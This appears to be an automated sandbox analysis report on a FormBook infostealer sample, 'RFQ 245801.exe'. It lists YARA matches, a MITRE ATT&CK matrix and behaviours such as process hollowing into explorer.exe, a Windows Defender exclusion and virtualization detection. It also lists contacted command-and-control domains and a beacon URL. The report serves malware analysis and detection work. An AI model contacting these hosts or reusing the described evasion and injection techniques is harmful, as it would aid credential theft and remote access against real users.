          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00645FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00645FE5
          Source: C:\Users\user\Desktop\RFQ 245801.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00644B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx,7_2_00644B96

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts622
          Process Injection          		11
          Disable or Modify Tools          		LSASS Memory231
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Abuse Elevation Control Mechanism          		41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading          		1
          Access Token Manipulation          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script622
          Process Injection          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information          		Cached Domain Credentials1
          System Network Configuration Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Abuse Elevation Control Mechanism          		DCSync1
          System Network Connections Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
          Obfuscated Files or Information          		Proc Filesystem1
          File and Directory Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
          Software Packing          		/etc/passwd and /etc/shadow213
          System Information Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          DLL Side-Loading          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528045 Sample: RFQ 245801.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 37 www.venir-bienne.info 2->37 39 www.sx9u.shop 2->39 41 9 other IPs or domains 2->41 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 12 other signatures 2->51 11 RFQ 245801.exe 4 2->11         started        signatures3 process4 file5 35 C:\Users\user\AppData\...\RFQ 245801.exe.log, CSV 11->35 dropped 57 Adds a directory exclusion to Windows Defender 11->57 59 Injects a PE file into a foreign processes 11->59 15 RFQ 245801.exe 11->15         started        18 powershell.exe 23 11->18         started        20 RFQ 245801.exe 11->20         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 77 2 other signatures 15->77 22 explorer.exe 55 1 15->22 injected 75 Loading BitLocker PowerShell Module 18->75 26 conhost.exe 18->26         started        process9 dnsIp10 43 www.j88.travel 188.114.96.3, 49743, 80 CLOUDFLARENETUS European Union 22->43 53 System process connects to network (likely due to code injection or exploit) 22->53 55 Uses netstat to query active network connections and open ports 22->55 28 NETSTAT.EXE 22->28         started        signatures11 process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 28->61 63 Maps a DLL or memory area into another process 28->63 65 Tries to detect virtualization through RDTSC time measurements 28->65 67 Switches to a custom stack to bypass stack traces 28->67 31 cmd.exe 1 28->31         started        process14 process15 33 conhost.exe 31->33         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RFQ 245801.exe45%ReversingLabsByteCode-MSIL.Trojan.Nekark
          RFQ 245801.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          http://www.fontbureau.com/designers0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://word.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://www.fontbureau.com/designersG0%URL Reputationsafe
          http://www.fontbureau.com/designers/?0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.com/designers?0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.j88.travel
          		188.114.96.3
          		truetrue
            		unknown
            www.oko.events
            		185.26.122.70
            		truetrue
              		unknown
              www.458881233.men
              		unknown
              		unknowntrue
                		unknown
                www.khizmetlergirisyapzzz2024.net
                		unknown
                		unknowntrue
                  		unknown
                  www.ridges-freezers-56090.bond
                  		unknown
                  		unknowntrue
                    		unknown
                    www.ilw.legal
                    		unknown
                    		unknowntrue
                      		unknown
                      www.sx9u.shop
                      		unknown
                      		unknowntrue
                        		unknown
                        www.venir-bienne.info
                        		unknown
                        		unknowntrue
                          		unknown
                          www.delark.click
                          		unknown
                          		unknowntrue
                            		unknown
                            www.02s-pest-control-us-ze.fun
                            		unknown
                            		unknowntrue
                              		unknown
                              www.earing-tests-69481.bond
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdFtrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://aka.ms/odirmrexplorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.oko.eventsReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.delark.click/c24t/www.ilw.legalexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.delark.clickReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.ridges-freezers-56090.bondReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.02s-pest-control-us-ze.funexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.aithful.events/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.earing-tests-69481.bond/c24t/www.458881233.menexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.fontbureau.com/designersRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://excel.office.comexplorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.ridges-freezers-56090.bond/c24t/www.oko.eventsexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.aithful.eventsexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.sx9u.shopReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.sajatypeworks.comRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cn/cTheRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.khizmetlergirisyapzzz2024.net/c24t/www.lc-driving-school.netexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/DPleaseRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.02s-pest-control-us-ze.funReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.j88.travelReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000006.00000002.4160246853.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.urwpp.deDPleaseRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.zhongyicts.com.cnRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.ilw.legal/c24t/www.02s-pest-control-us-ze.funexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ 245801.exe, 00000000.00000002.1746477242.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.khizmetlergirisyapzzz2024.netexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://www.sx9u.shop/c24t/www.consuyt.xyzexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000003.3482833958.000000000C9B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160246853.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3112813683.000000000C9AE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.earing-tests-69481.bondexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://wns.windows.com/Lexplorer.exe, 00000006.00000000.1749071753.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.venir-bienne.info/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.venir-bienne.info/c24t/www.ridges-freezers-56090.bondexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://word.office.comexplorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
